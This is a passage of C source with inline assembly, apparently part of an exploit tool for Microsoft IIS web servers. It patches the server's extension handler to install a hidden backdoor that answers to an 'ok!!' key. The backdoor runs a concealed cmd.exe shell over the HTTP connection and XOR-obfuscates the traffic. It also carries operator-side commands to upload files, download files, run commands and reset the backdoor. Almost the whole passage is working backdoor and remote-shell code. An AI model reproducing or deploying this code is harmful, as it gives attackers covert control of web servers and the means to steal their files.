  796.              call getexceptretadd
  797.          }
  798.          i&=0xfffff000;
  799.          i+=0x1000;
  800.          for(;i<l;++i){
  801.              if(*(int *)i==HttpExtensionProcadd){
  802.                *(int *)i=dooradd-7;
  803.               //    break;
  804.             }
  805.          }
  806.      //    *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
  807.    
  808.        }
  809.        writeclient= *(int *)(ecb+0x84);
  810.        readclient = *(int *)(ecb+0x88);
  811.        ConnID     = *(int *)(ecb+8) ;
  812.        stradd=k;
  813.           _asm{
  814.               lea edi,except
  815.               mov eax,dword ptr [edi+0x08]
  816.               mov dword ptr fs:[0],eax
  817.           }
  818.           if(thedoor==0){
  819.               _asm{
  820.                    mov eax,0xffffffff
  821.                    mov dword ptr fs:[0],eax
  822.               }
  823.           }
  824.                stradd2=stradd;
  825.                stradd+=8;
  826.                k=0x20;
  827.                writeclient(ConnID,*(int *)(ecb+0x6c),&k,0);
  828.                k=8;
  829.                writeclient(ConnID,stradd+9,&k,0);
  830.    //            Sleepadd(100);
  831.    
  832.                shelllocknum=LOCKBIGNUM2;
  833.                if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int
  834.    *)(ecb+0x64)+4)=='notx') shelllocknum=0;
  835.    
  836.    // iiscmd:
  837.                lockintvar1=shelllocknum%LOCKBIGNUM;
  838.                lockintvar2=lockintvar1;
  839.    iiscmd:
  840.    /*
  841.                lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  842.                lockintvar2=lockintvar1;
  843.    */
  844.                sa.nLength=12;
  845.                sa.lpSecurityDescriptor=0;
  846.                sa.bInheritHandle=TRUE;
  847.                CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
  848.                CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
  849.    // ZeroMemory(&siinfo,sizeof(siinfo));
  850.                _asm{
  851.                    lea EDI,siinfo
  852.                    xor eax,eax
  853.                    mov ecx,0x11
  854.                    repnz stosd
  855.                }
  856.        siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
  857.        siinfo.wShowWindow = SW_HIDE;
  858.        siinfo.hStdInput = hReadPipe2;
  859.        siinfo.hStdOutput=hWritePipe1;
  860.        siinfo.hStdError =hWritePipe1;
  861.        k=0;
  862.    //    while(k==0)
  863.    //   {
  864.            k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo,
  865.    &ProcessInformation);
  866.    //        stradd+=8;
  867.    //    }
  868.            Sleepadd(200);
  869.    //        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0
  870.    );
  871.    
  872.    
  873.        i=0;
  874.        while(1) {
  875.            PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
  876.            if(lBytesRead>0) {
  877.               i=0;
  878.               ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
  879.               if(lBytesRead>0) {
  880.                   for(k=0;k<lBytesRead;++k){
  881.                    lockintvar2=lockintvar2*0x100;
  882.                    lockintvar2=lockintvar2%LOCKBIGNUM;
  883.                    lockcharvar=lockintvar2%0x100;
  884.                    Buff[k]^=lockcharvar;   // DATAXORCODE;
  885.    //                Buff[k]^=DATAXORCODE;
  886.                   }
  887.                   writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
  888.    //               Sleepadd(20);
  889.               }
  890.            }
  891.            else{
  892.    //                 Sleepadd(10);
  893.                 l=0;
  894.                 if(i<50){
  895.                     l=1;
  896.                     ++i;
  897.                     k=1;
  898.                     lBytesRead=0;
  899.                 }
  900.    
  901.    
  902.    
  903.                  while(l==0){
  904.                     i=0;
  905.                     lBytesRead=SHELLBUFFSIZE;
  906.                     k=readclient(ConnID,Buff,&lBytesRead);
  907.                      for(l=0;l<lBytesRead;++l){
  908.                             lockintvar1=lockintvar1*0x100;
  909.                             lockintvar1=lockintvar1%LOCKBIGNUM;
  910.                             lockcharvar=lockintvar1%0x100;
  911.                             Buff[l]^=lockcharvar;   // DATAXORCODE;
  912.                      }
  913.    
  914.                      if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu
  915.    ff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
  916.                          k=8;
  917.                          WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
  918.    cmd.exe
  919.                          WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
  920.    cmd.exe
  921.                          stradd2=Buff+5;
  922.                          Buff[lBytesRead]=0;
  923.                          goto iiscmd;
  924.                      }
  925.                      if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Bu
  926.    ff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){
  927.    
  928.    
  929.                            lBytesRead=0x0c;
  930.                            writeclient(ConnID,stradd+0x11,&lBytesRead,0);
  931.                               lockintvar1=shelllocknum%LOCKBIGNUM;
  932.                            lockintvar2=lockintvar1;
  933.                            lBytesRead=0;
  934.                      }
  935.                      if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu
  936.    ff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
  937.                          k=8;
  938.                          WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
  939.    cmd.exe
  940.                          WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
  941.    cmd.exe
  942.                          *(int *)(dooradd-0x0c)=0;
  943.                          Sleepadd(0x7fffffff);
  944.                          _asm{
  945.                              mov eax,0
  946.                              mov esp,0
  947.                              jmp eax
  948.                          }
  949.                      }
  950.    
  951.    
  952.    if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]
  953.    ==' ')
  954.                     {
  955.                        l=*(int *)(Buff+4);
  956.        //
  957.    WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
  958.                        fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+
  959.    GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
  960.    );
  961.                        k=GetLastErroradd();
  962.                        i=0;
  963.                        while(l>0){
  964.                           lBytesRead=SHELLBUFFSIZE;
  965.                           k=readclient(ConnID,Buff,&lBytesRead);
  966.                           if(k==1){
  967.                               if(lBytesRead>0){
  968.                                   for(k=0;k<lBytesRead;++k){
  969.                                         lockintvar1=lockintvar1*0x100;
  970.                                         lockintvar1=lockintvar1%LOCKBIGNUM;
  971.                                         lockcharvar=lockintvar1%0x100;
  972.                                         Buff[k]^=lockcharvar;   //
  973.    DATAXORCODE;
  974.                                   }
  975.    
  976.                                 l-=lBytesRead;
  977.                            //     if(fpt>0)
  978.    
  979.    WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
  980.    //                             else Sleepadd(010);
  981.                               }
  982.    
  983.    //                           if(i>100) l=0;
  984.                           }
  985.                           else {
  986.                               Sleepadd(0100);
  987.                               ++i;
  988.                           }
  989.                           if(i>10000) l=0;
  990.                        }
  991.    
  992.                        CloseHandleadd(fpt);
  993.                        l=0;
  994.                     }
  995.                     else{
  996.    
  997.    if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]
  998.    ==' '){
  999.    
  1000.                    //
  1001.    fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTIN
  1002.    G,FILE_ATTRIBUTE_NORMAL,0);
  1003.    
  1004.    
  1005.    fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,
  1006.    NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
  1007.                             Sleepadd(100);
  1008.                             l=GetFileSizeadd(fpt,&k);
  1009.                             *(int *)Buff='ezis';        //size
  1010.                             *(int *)(Buff+4)=l;
  1011.                             lBytesRead=8;
  1012.                              for(i=0;i<lBytesRead;++i){
  1013.                                  lockintvar2=lockintvar2*0x100;
  1014.                                  lockintvar2=lockintvar2%LOCKBIGNUM;
  1015.                                  lockcharvar=lockintvar2%0x100;
  1016.                                  Buff[i]^=lockcharvar;   // DATAXORCODE;
  1017.                              }
  1018.    
  1019.                             writeclient(ConnID,Buff,&lBytesRead,0); //
  1020.    HSE_IO_SYNC);
  1021.                       //      Sleepadd(100);
  1022.                             i=0;
  1023.                             while(l>0){
  1024.                                  k=SHELLBUFFSIZE;
  1025.                                  ReadFileadd(fpt,Buff,k,&k,0);
  1026.                                  if(k>0){
  1027.                                     for(i=0;i<k;++i){
  1028.                                          lockintvar2=lockintvar2*0x100;
  1029.                                          lockintvar2=lockintvar2%LOCKBIGNUM
  1030.    ;
  1031.                                          lockcharvar=lockintvar2%0x100;
  1032.                                          Buff[i]^=lockcharvar;   //
  1033.    DATAXORCODE;
  1034.                                     }
  1035.    
  1036.                                     i=0;
  1037.                                     l-=k;
  1038.                                     writeclient(ConnID,Buff,&k,0); //
  1039.    HSE_IO_SYNC);
  1040.    //                                   Sleepadd(100);
  1041.                  //
  1042.    k=readclient(ConnID,Buff,&lBytesRead);
  1043.    
  1044.                                     }
  1045.                                  else ++i;
  1046.                                  if(i>100) l=0;
  1047.                             }
  1048.                             CloseHandleadd(fpt);
  1049.                             l=0;
  1050.                         }
  1051.                         else l=1;
  1052.                     }
  1053.                  }
  1054.                  if(k!=1){
  1055.                    k=8;
  1056.                    WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
  1057.                    WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
  1058.                    WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
  1059.                    k=GetLastErroradd();
  1060.                    while(k==0x2746){
  1061.                      if(thedoor==1)      goto asmreturn;
  1062.                      Sleepadd(0x7fffffff);                  //┬╜┬⌐├ï├Ç
  1063.                    }
  1064.    
  1065.                  }
  1066.                  else{
  1067.    
  1068.    WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
  1069.      //              Sleepadd(1000);
  1070.                  }
  1071.            }
  1072.        }
  1073.    
  1074.        die: goto die  ;
  1075.          _asm{
  1076.    asmreturn:
  1077.                       mov eax,HSE_STATUS_SUCCESS
  1078.                       leave
  1079.                       ret 04
  1080.    door:              push eax
  1081.                       mov eax,[esp+0x08]
  1082.                       mov eax,[eax+0x64]
  1083.                       mov eax,[eax]
  1084.                       cmp eax,'ok!!'
  1085.                       jnz jmpold
  1086.                       pop eax
  1087.                       push 0x12345678  //dooradd-0x13
  1088.                       ret
  1089.    jmpold:               pop  eax
  1090.                       push 0x12345678   //dooradd-0xc
  1091.                       ret               //1
  1092.                       jmp  door         //2
  1093.    getdoorcall:       call getdooradd   //5
  1094.    
  1095.    getexceptretadd:   pop  eax
  1096.                       push eax
  1097.                       mov  edi,dword ptr [stradd]
  1098.                       mov dword ptr [edi-0x0e],eax
  1099.                       ret
  1100.    errprogram:           mov eax,dword ptr [esp+0x0c]
  1101.                       add eax,0xb8
  1102.                       mov dword ptr [eax],0x11223344  //stradd-0xe
  1103.                       xor eax,eax                //2
  1104.                       ret                        //1
  1105.    execptprogram:     jmp errprogram            //2 bytes     stradd-7
  1106.    nextcall:          call getstradd            //5 bytes
  1107.                       NOP
  1108.                       NOP
  1109.                       NOP
  1110.                       NOP
  1111.                       NOP
  1112.                       NOP
  1113.                       NOP
  1114.                       NOP
  1115.                       NOP
  1116.            }
  1117.    }
  1118.    void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
  1119.    {
  1120.       int i,k;
  1121.       unsigned char temp;
  1122.       char *calladd;
  1123.       for(i=0;i<len;++i){
  1124.           temp=shellbuff[i];
  1125.           if(temp==0xe8){
  1126.             k=*(int *)(shellbuff+i+1);
  1127.             calladd=fnadd;
  1128.             calladd+=k;
  1129.             calladd+=i;
  1130.             calladd+=5;
  1131.             if(calladd==chkesp){
  1132.                 shellbuff[i]=0x90;
  1133.                 shellbuff[i+1]=0x43;   // inc ebx
  1134.                 shellbuff[i+2]=0x4b;    // dec ebx
  1135.                 shellbuff[i+3]=0x43;
  1136.                 shellbuff[i+4]=0x4b;
  1137.             }
  1138.           }
  1139.       }
  1140.    }
  1141.    void iisput(int fd,char *str){
  1142.    char *filename;
  1143.    char *filename2;
  1144.    FILE *fpt;
  1145.    char buff[0x2000];
  1146.    int size=0x2000,i,j,filesize,filesizehigh;
  1147.    filename="\0";
  1148.    filename2="\0";
  1149.    j=strlen(str);
  1150.    for(i=0;i<j;++i,++str){
  1151.         if(*str!=' '){
  1152.             filename=str;
  1153.             break;
  1154.         }
  1155.    }
  1156.    for(;i<j;++i,++str){
  1157.         if(*str==' ') {
  1158.             *str=0;
  1159.             break;
  1160.         }
  1161.    }
  1162.    ++i;
  1163.    ++str;
  1164.    for(;i<j;++i,++str){
  1165.         if(*str!=' '){
  1166.           filename2=str;
  1167.           break;
  1168.         }
  1169.    }
  1170.    for(;i<j;++i,++str){
  1171.         if(*str==' ') {
  1172.             *str=0;
  1173.             break;
  1174.         }
  1175.    }
  1176.    if(filename=="\x0") {
  1177.         printf("\n iisput filename [path\\fiename]\n");
  1178.         return;
  1179.    }
  1180.    if(filename2=="\x0") filename2=filename;
  1181.    printf("\n begin put file:%s",filename);
  1182.    j=0;
  1183.    ioctlsocket(fd, FIONBIO, &j);
  1184.    Sleep(1000);
  1185.    fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,
  1186.    FILE_ATTRIBUTE_NORMAL,0);
  1187.    filesize=GetFileSize(fpt,&filesizehigh);
  1188.    strcpy(buff,"put ");
  1189.    *(int *)(buff+4)=filesize;
  1190.    filesize=*(int *)(buff+4);
  1191.    strcpy(buff+0x8,filename2);
  1192.    newsend(fd,buff,i+0x9,0);
  1193.    printf("\n put file:%s to file:%s %d
  1194.    bytes",filename,filename2,filesize);
  1195.    Sleep(1000);
  1196.    while(filesize>0){
  1197.          size=0x800;
  1198.          ReadFile(fpt,buff,size,&size,NULL);
  1199.          if(size>0){
  1200.              filesize-=size;
  1201.              newsend(fd,buff,size,0);
  1202.    //          Sleep(0100);
  1203.    
  1204.          }
  1205.    }
  1206.    // size=filesize;
  1207.    // ReadFile(fpt,buff,size,&size,NULL);
  1208.    // if(size>0) send(fd,buff,size,0);
  1209.    CloseHandle(fpt);
  1210.    j=1;
  1211.    ioctlsocket(fd, FIONBIO, &j);
  1212.    printf("\n put file ok!\n");
  1213.    Sleep(1000);
  1214.    }
  1215.    void iisget(int fd,char *str){
  1216.    char *filename;
  1217.    char *filename2;
  1218.    FILE *fpt;
  1219.    char buff[0x2000];
  1220.    int size=0x2000,i,j,filesize,filesizehigh;
  1221.    filename="\0";
  1222.    filename2="\0";
  1223.    j=strlen(str);
  1224.    for(i=0;i<j;++i,++str){
  1225.         if(*str!=' '){
  1226.             filename=str;
  1227.             break;
  1228.         }
  1229.    }
  1230.    for(;i<j;++i,++str){
  1231.         if(*str==' ') {
  1232.             *str=0;
  1233.             break;
  1234.         }
  1235.    }
  1236.    ++i;
  1237.    ++str;
  1238.    for(;i<j;++i,++str){
  1239.         if(*str!=' '){
  1240.           filename2=str;
  1241.           break;
  1242.         }
  1243.    }
  1244.    for(;i<j;++i,++str){
  1245.         if(*str==' ') {
  1246.             *str=0;
  1247.             break;
  1248.         }
  1249.    }
  1250.    if(filename=="\x0") {
  1251.         printf("\n iisget filename [path\\fiename]\n");
  1252.         return;
  1253.    }
  1254.    if(filename2=="\x0") filename2=filename;
  1255.    printf("\n begin get file:%s",filename);
  1256.    fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHAR
  1257.    E_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
  1258.    strcpy(buff,"get ");
  1259.    strcpy(buff+0x4,filename2);
  1260.    newsend(fd,buff,i+0x5,0);
  1261.    printf("\n get file:%s from file:%s",filename,filename2);
  1262.      j=0;
  1263.      ioctlsocket(fd, FIONBIO, &j);
  1264.    i=0;
  1265.    filesize=0;
  1266.    j=0;
  1267.    while(j<100){
  1268.    //    Sleep(100);
  1269.        i=newrecv(fd,buff,0x800,0);
  1270.        if(i>0){
  1271.            buff[i]=0;
  1272.            if(memcmp(buff,"size",4)==0){
  1273.                filesize=*(int *)(buff+4);
  1274.                j=100;
  1275.            }
  1276.            else {
  1277.    
  1278.    /*              for(j=0;j<i;++j){
  1279.                    lockintvar1=lockintvar1*0x100;
  1280.                    lockintvar1=lockintvar1%LOCKBIGNUM;
  1281.                    lockcharvar=lockintvar1%0x100;
  1282.                    buff[j]^=lockcharvar;   // DATAXORCODE;
  1283.                  }
  1284.    */
  1285.                  j=0;
  1286.                  printf("\n recv %s",buff);
  1287.            }
  1288.        }
  1289.        else ++j;
  1290.    //    if(j>1000) i=0;
  1291.    }
  1292.    printf("\n file %d bytes %d\n",filesize,i);
  1293.    if(i>8){
  1294.          i-=8;
  1295.          filesize-=i;
  1296.          WriteFile(fpt,buff+8,i,&i,NULL);
  1297.    
  1298.    }
  1299.    while(filesize>0){
  1300.              size=newrecv(fd,buff,0x800,0);
  1301.              if(size>0){
  1302.                 filesize-=size;
  1303.                 WriteFile(fpt,buff,size,&size,NULL);
  1304.    
  1305.              }
  1306.              else {
  1307.                  if(size==0) {
  1308.                   printf("\n ftp close \n ");
  1309.                  }
  1310.                  else {
  1311.                      printf("\n Sleep(100)");
  1312.                      Sleep(100);
  1313.                  }
  1314.              }
  1315.    }
  1316.    CloseHandle(fpt);
  1317.    printf("\n get file ok!\n");
  1318.    j=1;
  1319.    ioctlsocket(fd, FIONBIO, &j);
  1320.    }
  1321.    void iisreset(int fd,char *str){
  1322.        char buff[0x2000];
  1323.        int  i,j;
  1324.        printf("\nreset xor data.\n");
  1325.        Sleep(1000);
  1326.        j=0;
  1327.        ioctlsocket(fd, FIONBIO, &j);
  1328.        strcpy(buff,"reset");
  1329.        newsend(fd,buff,strlen(buff),0);
  1330.        Sleep(1000);
  1331.    
  1332.        lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  1333.        lockintvar2=lockintvar1;
  1334.        while(1){
  1335.          j=recv(fd,buff,0x2000,0);
  1336.          if(j>0){
  1337.              buff[j]=0;
  1338.              for(i=0;i<j;++i){
  1339.                  if(buff[i]==0) buff[i]='b';
  1340.              }
  1341.        //      printf("\nrecv 0x%x bytes:%s",j,buff);
  1342.              if(strstr(buff,"xordatareset")!=0){
  1343.                  printf("\nxor data reset ok.\n");
  1344.                 for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
  1345.                    lockintvar1=lockintvar1*0x100;
  1346.                    lockintvar1=lockintvar1%LOCKBIGNUM;
  1347.                    lockcharvar=lockintvar1%0x100;
  1348.                    buff[i]^=lockcharvar;   // DATAXORCODE;
  1349.                  }
  1350.    
  1351.                  break;
  1352.              }
  1353.          }
  1354.    //      else if(j==0) break;
  1355.    //      strcpy(buff,"\r\nmkdir d:\\test6\r\n");
  1356.    //      newsend(fd,buff,strlen(buff),0);
  1357.        }
  1358.        Sleep(1000);
  1359.        j=1;
  1360.        ioctlsocket(fd, FIONBIO, &j);
  1361.    //    printf("aaa");
  1362.    }
  1363.    void iisdie(int fd,char *str){
  1364.        char buff[0x200];
  1365.        int  j;
  1366.        printf("\niis die.\n");
  1367.        j=0;
  1368.        ioctlsocket(fd, FIONBIO, &j);
  1369.        Sleep(1000);
  1370.        strcpy(buff,"iisrr ");
  1371.        newsend(fd,buff,strlen(buff),0);
  1372.        Sleep(1000);
  1373.        j=1;
  1374.        ioctlsocket(fd, FIONBIO, &j);
  1375.        lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  1376.        lockintvar2=lockintvar1;
  1377.    }
  1378.    void iiscmd(int fd,char *str){
  1379.        char *cmd="\0";
  1380.        char buff[2000];
  1381.        int  i,j;
  1382.        j=strlen(str);
  1383.        for(i=0;i<j;++i,++str){
  1384.          if(*str!=' '){
  1385.              cmd=str;
  1386.             break;
  1387.          }
  1388.        }
  1389.        j=strlen(str);
  1390.        for(i=0;i<j;++i){
  1391.           if(*(str+j-i-1)!=' ') {
  1392.               break;
  1393.           }
  1394.           else *(str+j-i-1)=0;
  1395.        }
  1396.    
  1397.        if(cmd=="\x0") {
  1398.            printf("\niiscmd cmd\n");
  1399.            return;
  1400.        }
  1401.        printf("\nbegin run cmd:%s",cmd);
  1402.        j=0;
  1403.        ioctlsocket(fd, FIONBIO, &j);
  1404.        Sleep(1000);
  1405.        strcpy(buff,"iisc ");
  1406.        strcat(buff,cmd);
  1407.        newsend(fd,buff,strlen(buff),0);
  1408.        Sleep(1000);
  1409.        j=1;
  1410.        ioctlsocket(fd, FIONBIO, &j);
  1411.    /*
  1412.        lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  1413.        lockintvar2=lockintvar1;
  1414.    */
  1415.    }
  1416.    int newrecv(int fd,char *buff,int size,int flag){
  1417.    
  1418.        int i,k;
  1419.        k=recv(fd,buff,size,flag);
  1420.        if(xordatabegin==1){
  1421.                  for(i=0;i<k;++i){
  1422.                    lockintvar1=lockintvar1*0x100;
  1423.                    lockintvar1=lockintvar1%LOCKBIGNUM;
  1424.                    lockcharvar=lockintvar1%0x100;
  1425.                    buff[i]^=lockcharvar;   // DATAXORCODE;
  1426.                  }
  1427.    
  1428.        }
  1429.        else{
  1430.            if(k>0){
  1431.                buff[k]=0;
  1432.                if(strstr(buff,"XORDATA")!=0) {
  1433.                  xordatabegin=1;
  1434.                  for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
  1435.                    lockintvar1=lockintvar1*0x100;
  1436.                    lockintvar1=lockintvar1%LOCKBIGNUM;
  1437.                    lockcharvar=lockintvar1%0x100;
  1438.                    buff[i]^=lockcharvar;   // DATAXORCODE;
  1439.                  }
  1440.                }
  1441.             }
  1442.    
  1443.        }
  1444.        return(k);
  1445.    }
  1446.    int newsend(int fd,char *buff,int size,int flag){
  1447.              int i;
  1448.    
  1449.              for(i=0;i<size;++i){
  1450.                    lockintvar2=lockintvar2*0x100;
  1451.                    lockintvar2=lockintvar2%LOCKBIGNUM;
  1452.                    lockcharvar=lockintvar2%0x100;
  1453.                    buff[i]^=lockcharvar;   // DATAXORCODE;
  1454.      //              buff[i]^=DATAXORCODE;
  1455.              }
  1456.          return(send(fd,buff,size,flag));
  1457.    }
  1458.    void iishelp(){
  1459.      printf("\nusage:");
  1460.      printf("\niisget filename filename.  get file from web server.");
  1461.      printf("\niisput filename filename.  put file to web server.");
  1462.      printf("\niiscmd cmd.  run cmd on web server.");
  1463.      printf("\niisreset.  reset the xor data.");
  1464.      printf("\niisdie.  reset the asp door.");
  1465.      printf("\n\n");
  1466.    }
  1467.